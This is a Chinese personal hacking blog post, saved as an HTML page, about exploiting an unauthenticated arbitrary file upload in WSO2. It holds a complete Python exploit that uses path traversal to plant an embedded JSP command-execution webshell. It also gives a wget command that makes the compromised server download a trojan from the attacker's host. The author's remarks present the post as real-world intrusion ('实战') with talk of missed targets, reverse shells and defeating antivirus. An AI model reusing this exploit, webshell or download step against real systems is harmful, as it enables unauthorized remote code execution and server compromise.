

<!DOCTYPE html>
<html lang="zh-CN" >



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/watchdog.jpg">
  <link rel="icon" href="/img/watchdog.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#14191e">
  <meta name="description" content="">
  <meta name="author" content="z3rg">
  <meta name="keywords" content="">
  <meta name="description" content="WSO2漏洞利用把exp代码发上，wso2的未授权任意文件上传 值得一提的是我过去对文件上传这一类漏洞利用exp都没了解到requests库的files可以上传，但是这次发现了，这样exp编写就方便太多了。 12345678910111213141516171819202122232425262728293031import requests, urllib3, sysurllib3.disabl">
<meta property="og:type" content="article">
<meta property="og:title" content="WSO2漏洞利用及后渗透过程中的问题">
<meta property="og:url" content="https://maybe279.github.io/posts/wso22rejlafoipk/index.html">
<meta property="og:site_name" content="HackLog">
<meta property="og:description" content="WSO2漏洞利用把exp代码发上，wso2的未授权任意文件上传 值得一提的是我过去对文件上传这一类漏洞利用exp都没了解到requests库的files可以上传，但是这次发现了，这样exp编写就方便太多了。 12345678910111213141516171819202122232425262728293031import requests, urllib3, sysurllib3.disabl">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://maybe279.github.io/posts/wso22rejlafoipk/image-20220423235930990.png">
<meta property="og:image" content="https://maybe279.github.io/posts/wso22rejlafoipk/image-20220424000107352.png">
<meta property="article:published_time" content="2022-04-23T15:26:38.368Z">
<meta property="article:modified_time" content="2022-04-23T16:38:05.506Z">
<meta property="article:author" content="z3rg">
<meta property="article:tag" content="实战">
<meta property="article:tag" content="Hacking">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://maybe279.github.io/posts/wso22rejlafoipk/image-20220423235930990.png">
  
  <title>WSO2漏洞利用及后渗透过程中的问题 - HackLog</title>

  <link  rel="stylesheet" href="/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="/css/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="/css/gundongtiao.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"maybe279.github.io","root":"/","version":"1.8.12","typing":{"enable":true,"typeSpeed":100,"cursorChar":"_","loop":true},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname"}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="HackLog" type="application/atom+xml">
</head>



<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>root@Hacklog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/274974.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.4)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="WSO2漏洞利用及后渗透过程中的问题">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      z3rg
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-04-23 23:26" pubdate>
        2022年4月23日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.6k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      8 分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">WSO2漏洞利用及后渗透过程中的问题</h1>
            
            <div class="markdown-body">
              <h2 id="WSO2漏洞利用"><a href="#WSO2漏洞利用" class="headerlink" title="WSO2漏洞利用"></a>WSO2漏洞利用</h2><p>把exp代码发上，wso2的未授权任意文件上传</p>
<p>值得一提的是我过去对文件上传这一类漏洞利用exp都没了解到requests库的files可以上传，但是这次发现了，这样exp编写就方便太多了。</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests, urllib3, sys<br>urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br><br><span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(sys.argv) != <span class="hljs-number">3</span>:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;Usage: python3 <span class="hljs-subst">&#123;sys.argv[<span class="hljs-number">0</span>]&#125;</span> https://host shell.jsp&quot;</span>)<br>    exit()<br>    <br>host, file = sys.argv[<span class="hljs-number">1</span>:]<br>shell = <span class="hljs-string">&quot;&quot;&quot;&lt;FORM&gt;</span><br><span class="hljs-string">    &lt;INPUT name=&#x27;cmd&#x27; type=text&gt;</span><br><span class="hljs-string">    &lt;INPUT type=submit value=&#x27;Run&#x27;&gt;</span><br><span class="hljs-string">&lt;/FORM&gt;</span><br><span class="hljs-string">&lt;%@ page import=&quot;java.io.*&quot; %&gt;</span><br><span class="hljs-string">    &lt;%</span><br><span class="hljs-string">    String cmd = request.getParameter(&quot;cmd&quot;);</span><br><span class="hljs-string">    String output = &quot;&quot;;</span><br><span class="hljs-string">    if(cmd != null) &#123;</span><br><span class="hljs-string">        String s = null;</span><br><span class="hljs-string">        try &#123;</span><br><span class="hljs-string">            Process p = Runtime.getRuntime().exec(cmd,null,null);</span><br><span class="hljs-string">            BufferedReader sI = new BufferedReader(new</span><br><span class="hljs-string">InputStreamReader(p.getInputStream()));</span><br><span class="hljs-string">            while((s = sI.readLine()) != null) &#123; output += s+&quot;&lt;/br&gt;&quot;; &#125;</span><br><span class="hljs-string">        &#125;  catch(IOException e) &#123;   e.printStackTrace();   &#125;</span><br><span class="hljs-string">    &#125;</span><br><span class="hljs-string">%&gt;</span><br><span class="hljs-string">        &lt;pre&gt;&lt;%=output %&gt;&lt;/pre&gt;&quot;&quot;&quot;</span><br>proxies = &#123;<span class="hljs-string">&quot;http&quot;</span>: <span class="hljs-string">&quot;http://127.0.0.1:8080&quot;</span>,<span class="hljs-string">&quot;https&quot;</span>: <span class="hljs-string">&quot;http://127.0.0.1:8080&quot;</span>&#125;<br>files = &#123;<span class="hljs-string">f&quot;../../../../repository/deployment/server/webapps/authenticationendpoint/<span class="hljs-subst">&#123;file&#125;</span>&quot;</span>: shell&#125;<br>response = requests.post(<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;host&#125;</span>/fileupload/toolsAny&#x27;</span>, files=files, verify=<span class="hljs-literal">False</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;shell @ <span class="hljs-subst">&#123;host&#125;</span>/authenticationendpoint/<span class="hljs-subst">&#123;file&#125;</span>&quot;</span>)<br></code></pre></div></td></tr></table></figure>

<p>同时这里有个坑，那就是下面这几条，请求得把verify属性改为False同时关闭urllib3的不安全警报，如果不关会导致一些不安全的https请求访问不了，这样就会错失目标，实际上我第一轮结束才发现这个问题，还没有进行第二轮测试。</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span> urllib3<br>urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br>verify=<span class="hljs-literal">False</span><br></code></pre></div></td></tr></table></figure>

<p>然后再说一下上传的shell的代码问题，实测直接替换成哥斯拉的马传不上去，我目测可能是长度超标，对方对上传的文件的大小做了限制，然后我看了下jsp文件上传的代码，长度比哥斯拉还长。。这就没办法了，我尝试用echo ‘xxx’ &gt;&gt; xx.jsp写入一个马进去，但是您猜怎么着，这该死的echo直接把我后面的命令全打印出来了，我尼玛文件是一个字都没写进去，我本来尝试改一下jsp的马让他直接echo，不过后来又想到一个办法，操作系统是linux，直接使用wget让对方服务器远程下载我服务器上准备的文件，于是愉快的进入最初步的后渗透。</p>
<h2 id="后渗透"><a href="#后渗透" class="headerlink" title="后渗透"></a>后渗透</h2><p>在服务器上传我们需要的木马，然后开个http服务器。</p>
<p><img src="/posts/wso22rejlafoipk/image-20220423235930990.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/posts/wso22rejlafoipk/image-20220424000107352.png" srcset="/img/loading.gif" lazyload></p>
<p>这样一来对方就能远程访问到我们的http服务器了</p>
<p>接下来很简单，直接在shell运行命令即可</p>
<figure class="highlight shell"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs shell">wget http://xxx.xxx.xxx.xxx:xxx/wso2.jsp -P xxx/xxx/<br></code></pre></div></td></tr></table></figure>

<p>对方下载到准备好木马，然后直接连接再后续操作就不多啰嗦了。</p>
<p>有一点就算在shell中上传大文件并不靠谱，最好的办法还是远程下载。</p>
<h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><p>这几天其实提醒了我一个非常重要的点，那就是一定要懂java，现在java的环境越来越多，如果不懂碰上java连上传个webshell都不知道怎么改，而且最近很多大型漏洞都是出自于java，很多框架和系统我听都没听说过，就比如这个wso2，如果没有爆出0day，我压根就没听说过这个系统，如果没人复现，我自己搭环境都是个大问题，java必须现在就得肝起来了，拖不得。</p>
<p>然后又说起内网，我今天突然想到netcat，它可以用来反弹shell，在内网中似乎也有很大作用，不过我还在思考转发远程桌面的事情，我上次在一台winserver上吃了亏，试了各种方法就是转发不出来远程桌面，很气，难道说是杀软的缘故？不知道到底怎么样能把杀软干掉，或者彻底无视它们。内网也是我没有筑基的一片地方，主要还是集中在提权、免杀问题上，这个对老手来说应该问题不大，至于大型内网就根本没法涉及了，像是域渗透这些，对我来说一片空白，也没有机会涉及到这些，这年头突破外网已经成了最大的屏障，给我这种野生黑客撞到个大型内网实战简直是走狗屎运了，想练域渗透最直接的办法只有靠靶场。</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E5%AE%9E%E6%88%98/">实战</a>
                    
                      <a class="hover-with-bg" href="/tags/Hacking/">Hacking</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/posts/dwqakvweokncopi/">
                        <span class="hidden-mobile">同源策略和CSRF研究及其与xss的组合拳</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
      <div class="col-lg-7 mx-auto nopadding-x-md">
        <div class="container custom mx-auto">
          <div class="linebox"><div id="particles-js"></div></div> 
        </div>
      </div>
    
  </main>
  <center><img src="/img/watchdog4.jpg" srcset="/img/loading.gif" lazyload style="width: auto;max-width: 100%;"></center>
  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://maybe279.github.io/about/" rel="nofollow noopener"> <span style="color:#69ca62"> <u> <i class="iconfont icon-love"></i>RSS订阅地址 </u> </span> </a> <p>ψ(｀∇´)ψ</p> <hr> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        京ICP证123456号
      </a>
    </span>
    
      
        <span>
          <a
            href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=12345678"
            rel="nofollow noopener"
            class="beian-police"
            target="_blank"
          >
            
              <span style="visibility: hidden; width: 0">|</span>
              <img src="/img/police_beian.png" srcset="/img/loading.gif" lazyload alt="police-icon"/>
            
            <span>京公网安备12345678号</span>
          </a>
        </span>
      
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="/js/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="/js/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="/js/jquery.min.js" ></script>
<script  src="/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="/js/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  



  <script defer src="/js/busuanzi.pure.mini.js" ></script>




  <script  src="/js/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>














  
<script src="/js/caidai.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/hibiki.model.json"},"display":{"position":"right","width":250,"height":600},"mobile":{"show":false,"scale":0.4,"position":"right"},"react":{"opacity":0.7},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
